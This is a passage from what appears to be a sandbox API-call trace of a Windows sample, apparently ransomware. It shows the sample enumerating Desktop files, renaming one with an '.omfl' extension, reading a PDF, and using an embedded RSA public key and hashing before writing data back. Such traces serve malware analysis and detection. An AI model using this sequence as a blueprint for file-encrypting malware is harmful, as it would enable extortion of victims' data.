(HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.364] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.364] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.364] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.364] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.364] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b60 [0130.364] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8b0 [0130.364] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b78 [0130.365] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.365] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b48 [0130.365] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0130.365] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.365] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.365] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.365] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b90 [0130.365] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0130.365] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8a0 [0130.365] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.365] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.365] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b60 | out: hHeap=0x4970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b60 [0130.365] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.365] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.365] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.366] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.366] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b60 | out: hHeap=0x4970000) returned 1 [0130.366] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.366] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b90 | out: hHeap=0x4970000) returned 1 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.366] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.367] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b78 | out: hHeap=0x4970000) returned 1 [0130.367] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b48 | out: hHeap=0x4970000) returned 1 [0130.367] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49c5028 | out: hHeap=0x4970000) returned 1 [0130.367] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.367] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.367] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b30 | out: hHeap=0x4970000) returned 1 [0130.367] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xfe4f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.367] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.367] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.368] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.368] CloseHandle (hObject=0x5c8) returned 1 [0130.369] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.369] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0x7516fe8 [0130.369] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cDgmdg3S1-bS-1.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cdgmdg3s1-bs-1.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cDgmdg3S1-bS-1.swf.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cdgmdg3s1-bs-1.swf.omfl")) returned 1 [0130.372] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf018080, ftCreationTime.dwHighDateTime=0x1d5e279, ftLastAccessTime.dwLowDateTime=0x5089840, ftLastAccessTime.dwHighDateTime=0x1d5d86a, ftLastWriteTime.dwLowDateTime=0x5089840, ftLastWriteTime.dwHighDateTime=0x1d5d86a, nFileSizeHigh=0x0, nFileSizeLow=0x918c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CmmRZZAyM5.pdf", cAlternateFileName="CMMRZZ~1.PDF")) returned 1 [0130.372] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.372] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0130.372] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CmmRZZAyM5.pdf") returned=".pdf" [0130.372] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CmmRZZAyM5.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cmmrzzaym5.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.372] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=37260) returned 1 [0130.372] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.375] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x9166, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.375] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.376] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x918c, lpOverlapped=0x0) returned 1 [0130.377] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.377] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.377] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.377] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.377] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.378] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.378] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.378] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.378] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.378] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.378] GetLastError () returned 0x0 [0130.378] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.378] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.378] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.378] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.378] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.378] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.379] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdcfae58, Size=0x218) returned 0xdce0a50 [0130.379] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.379] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b78 | out: hHeap=0x4970000) returned 1 [0130.379] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b90 | out: hHeap=0x4970000) returned 1 [0130.379] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.379] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.379] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.379] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.379] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0130.379] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b90 [0130.379] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.379] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16b78 [0130.379] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.379] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.379] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.379] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.379] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.379] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.379] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0130.379] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.379] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.379] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b90 | out: hHeap=0x4970000) returned 1 [0130.380] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.380] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b78 | out: hHeap=0x4970000) returned 1 [0130.380] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.380] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.380] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.380] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.380] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.380] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.380] GetCurrentThreadId () returned 0x618 [0130.380] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.380] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d58f0 [0130.380] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.380] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.380] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0x49c5028 [0130.380] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.380] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.380] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.380] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.380] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.380] GetCurrentThreadId () returned 0x618 [0130.380] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.380] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.380] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.380] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.380] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.380] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.380] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.380] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.380] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.380] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.381] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b78 [0130.381] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa860 [0130.381] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b90 [0130.381] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.381] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b60 [0130.381] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.381] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0130.381] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.382] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.382] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.382] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.382] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.382] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, 